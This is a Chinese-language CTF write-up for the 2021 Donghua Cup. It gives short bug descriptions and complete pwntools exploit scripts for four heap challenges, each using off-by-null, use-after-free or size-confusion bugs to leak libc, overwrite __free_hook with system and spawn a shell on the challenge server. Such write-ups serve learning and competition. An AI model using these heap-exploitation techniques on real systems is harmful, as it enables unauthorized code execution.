eeeeeeeeeeeeeeeea

愿我们永远热泪盈眶!

0%

东华杯2021

东华杯

一:cpp

2.31的off-by-null

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from pwn import *
#p = process("./pwn")
p = remote("47.104.143.202",43359)
context.log_level = "debug"
context.arch = "amd64"
libc = ELF("./libc-2.31.so")

def add(index,size):
p.sendlineafter(">>","1")
p.sendlineafter(">>",str(index))
p.sendlineafter(">>",str(size))

def edit(index,content):
p.sendlineafter(">>","2")
p.sendlineafter(">>",str(index))
p.sendlineafter(">>",content)

def show(index):
p.sendlineafter(">>","3")
p.sendlineafter(">>",str(index))

def free(index):
p.sendlineafter(">>","4")
p.sendlineafter(">>",str(index))



for i in range(7):
add(i,0x80) #0-6

add(7,0x18)
add(8,0x60)
add(9,0x10)
add(10,0x30)
edit(7,"a"*0x10+p64(0)+"\x91")
for i in range(7):
free(i)

free(8)
for i in range(7):
add(i,0x80)

add(8,0x60)
show(9)
libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00")) - libc.sym["__malloc_hook"] - 0x10 - 96
success("libc_base:"+hex(libc_base))
add(11,0x10)
add(12,0x18)
add(13,0x18)
add(14,0x10)
free(12)
free(14)
edit(13,p64(0)*3+p64(0x21)+p64(libc_base+libc.sym["__free_hook"]))
add(12,0x18)
add(15,0x18)

edit(15,p64(libc_base+libc.sym["system"]))
edit(12,"/bin/sh\x00")
free(12)
p.interactive()

二:gcc

2.31的UAF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import *
#p = process("./pwn")
p = remote("47.104.143.202",15348)
context.log_level = "debug"
context.arch = "amd64"
libc = ELF("./libc-2.31.so")

def g():
gdb.attach(p)
input()


def menu(choice):
p.sendlineafter(">>",str(choice))

def add(index,size):
menu(1)
p.sendlineafter(">>",str(index))
p.sendlineafter(">>",str(size))

def edit(index,content):
menu(2)
p.sendlineafter(">>",str(index))
p.sendlineafter(">>",content)

def show(index):
menu(3)
p.sendlineafter(">>",str(index))

def free(index):
menu(4)
p.sendlineafter(">>",str(index))

add(0,0x60)
add(1,0x60)
free(0)
free(1)
show(1)
p.recv()
heap_base = u64(p.recv(6).ljust(8,"\x00")) - 0x12ec0
success("heap_base:"+hex(heap_base))
edit(1,p64(heap_base+0x10))

add(2,0x67) #2
add(3,0x67)

edit(3,"\x07"*0x4f)
free(3)
show(3)
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym["__malloc_hook"] - 96 - 0x10
success("libc_base:"+hex(libc_base))

edit(3,"\x00"*0x4f)
free(1)
free(0)
edit(0,p64(libc_base+libc.sym["__free_hook"]))
add(4,0x67)
add(5,0x67) #free_hook
sleep(1)
edit(5,p64(libc_base+libc.sym["system"]))

edit(1,"/bin/sh\x00")

free(1)

p.interactive()

三:bg3

free之后存放size的地方没有清空,再次add同一个堆就会造成size叠加

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
from pwn import *
#p = process("./pwn")
p = remote("47.104.143.202",25997)
context.log_level = "debug"
context.arch = "amd64"
libc = ELF("./libc-2.31.so")


def menu(idx):
p.sendlineafter('Select:',str(idx))

def add(idx,size):
menu(1)
p.sendlineafter("Index:",str(idx))
p.sendlineafter("PayloadLength:",str(size))

def edit(idx,content):
menu(2)
p.sendlineafter('Index:',str(idx))
p.sendlineafter('BugInfo:',content)

def free(idx):
menu(4)
p.sendlineafter('Index:',str(idx))

def show(idx):
menu(3)
p.sendlineafter('Index:',str(idx))


def g():
gdb.attach(p)
input()


add(0,0x665)
add(1,0x68)
add(2,0x68)

free(0)
add(0,0x68) #leak

show(0)
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x10-libc.sym['__malloc_hook']-1248
free_hook = libc_base +libc.sym['__free_hook']
system = libc_base+libc.sym['system']
success("libc_base:"+hex(libc_base))

add(3,0x68)
add(4,0x68)
free(4)
free(3)
payload = '\x00'*0x68+p64(0x71)+p64(free_hook)
edit(0,payload)
add(5,0x68)
add(6,0x68)
edit(5,'/bin/sh\x00')
edit(6,p64(system))
free(5)

p.interactive()

四:boom_script

在另一篇博客单独写了,这里只放上exp,感谢t0rm3nt师傅帮助理解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
libc = ELF("./libc.so.6")
#p = remote("47.104.143.202",41299)
p = process("./boom_script")
bss=0x76100
p.sendlineafter("$",'1')

code = '''
a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
b = a;
a = "aaaaaa";
prints(b);
c=0;
array arr[20];
arr[0] = 1;
b="bbbbbb"
a1="cccccccccccccccccccccccccccccccccccccccccccccccccccccccc";

tc1 = "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee";
sss = "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee";
aaa = "/bin/sh";
tc1 = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
sss = "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";
prints("eeee");
inputn(c);
arr[0] = c;
arr[1] = c;



'''

p.sendlineafter("length:",str(len(code)+1))
p.sendlineafter("code:",code)

libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x1ebbe0
success("libc_base:"+hex(libc_base))

p.sendlineafter("eeee",str(libc_base+libc.sym["__free_hook"]))

p.interactive()